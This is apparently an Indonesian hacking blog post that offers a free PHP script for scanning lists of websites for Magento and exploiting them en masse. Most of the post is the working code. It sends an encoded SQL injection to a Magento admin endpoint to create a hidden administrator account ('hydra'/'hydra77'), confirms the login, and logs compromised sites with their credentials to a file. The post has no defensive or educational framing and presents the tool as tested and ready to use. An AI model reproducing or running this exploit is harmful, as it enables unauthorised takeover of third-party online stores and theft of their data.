[UPDATED 10:18 PM 5/13/2018]
kali ini gw mw share exploit magento versi PHP
udah di test work 100%
Gw bagi tools ni bwat lu smua free, boleh di recode/dikembangin, tpi jgn lupa jangan di hapus nama pmbuatnya!
cara gunain nya sperti biasa: php scriptmu.php listtarget.txt
script ada di bawah :
kali ini gw mw share exploit magento versi PHP
udah di test work 100%
Gw bagi tools ni bwat lu smua free, boleh di recode/dikembangin, tpi jgn lupa jangan di hapus nama pmbuatnya!
cara gunain nya sperti biasa: php scriptmu.php listtarget.txt
script ada di bawah :
- <?php
- error_reporting(0);
- print '
- #=============================================#
- # Magento Scanner + Mass Exploiter #
- #=============================================#
- ';
- $get=file_get_contents($argv[1])
- or die("
- \n\tError ! cara penggunaan? visit http://yuzanotes.blogspot.com/
- \n\tThanks to synchronizer\n\n");
- $j=explode("\r\n",$get);
- foreach($j as $url){
- $url1 = str_replace('http://','',$url);
- $url3 = str_replace('https://','',$url1);
- $url2 = 'http://'.$url3;
- print "\n\n\t[?] Scanning ".$url1.'..';
- $dirnya = "/skin/adminhtml/default/default/reset.css";
- $ch1 = curl_init();
- curl_setopt ($ch1, CURLOPT_URL, $url2.$dirnya);
- curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch1, CURLOPT_TIMEOUT, 60);
- curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
- $result = curl_exec ($ch1);
- curl_close($ch1);
- if(preg_match('/Magento/', $result)) {
- print "\n\t[+] MAGENTO : TRUE";
- print "\n\t[+] Exploiting ".$url1."..";
- $expage = "/admin/Cms_Wysiwyg/directive/index/";
- $postdata = 'filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url2.$expage);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- #Exploitasi berhasil dan memulai cek Login setelah exploitasi
- if(preg_match('#200 OK#', $result)) {
- print "\n\t[+] Exploiting Success, mulai mengecek login..";
- $loginpage = $url2."/admin";
- $logindata = 'form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77';
- $hydra_ch = curl_init();
- curl_setopt ($hydra_ch, CURLOPT_URL, $loginpage);
- curl_setopt ($hydra_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($hydra_ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($hydra_ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($hydra_ch, CURLOPT_POSTFIELDS, $logindata);
- curl_setopt ($hydra_ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($hydra_ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($hydra_ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($hydra_ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($hydra_ch, CURLOPT_HEADER, 1);
- $hasil = curl_exec ($hydra_ch);
- curl_close($hydra_ch);
- if(preg_match('#302 Moved#', $hasil)) {
- #Exploitasi berhasil dan admin user baru benar benar masuk ke database.
- $fp = fopen("vuln_magento.txt", "a+");
- fwrite($fp, "========================================\n");
- fwrite($fp, "WEBSITE : ".$loginpage."\n");
- fwrite($fp, "USERNAME : hydra\n");
- fwrite($fp, "PASSWORD : hydra77\n");
- fwrite($fp, "========================================\n");
- fclose($fp);
- print "\n\t[+] Login Success ! \n\t[+] username : hydra \n\t[+] password : hydra77";
- print "\n\t[-] Login Page : ".$loginpage."\n";
- }
- else {
- #Exploitasi berhasil dan namun admin user tidak masuk ke database.
- print "\n\t[-] Login Failed :( ";
- print "\n\t[-] Keterangan : admin user tidak masuk ke database.\n";}
- }else {
- #Exploitasi gagal total
- print "\n\t[-] Exploitasi Failed :(\n ";}
- }else {
- print "\n\t[-] MAGENTO : FALSE\n";
- }
- }
- ?>
visit terus iya blog ini, klo prlu di bookmark biar ga lupa hehe, jgn lupa tinggalin komeng :)
di sini gak da yg namanya priv" an :)
NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI
No comments:
Write comments